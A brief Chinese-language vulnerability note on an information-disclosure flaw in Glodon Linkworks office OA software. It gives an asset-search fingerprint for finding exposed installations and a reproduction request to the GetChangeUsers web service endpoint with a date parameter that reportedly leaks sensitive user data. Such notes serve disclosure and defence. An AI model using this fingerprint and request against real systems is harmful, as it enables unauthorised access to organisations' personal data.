广联达OA GetChangeUsers 存在信息漏洞
一、漏洞简介
广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。广联达 Linkworks办公OA存在信息泄露.
二、影响版本
- 广联达办公OA
三、资产测绘
- app.name="广联达 OA"
- 登录页面
四、漏洞复现
可通过修改时间获取敏感信息
/Org/service/Service.asmx/GetChangeUsers?strDate=2023-01-02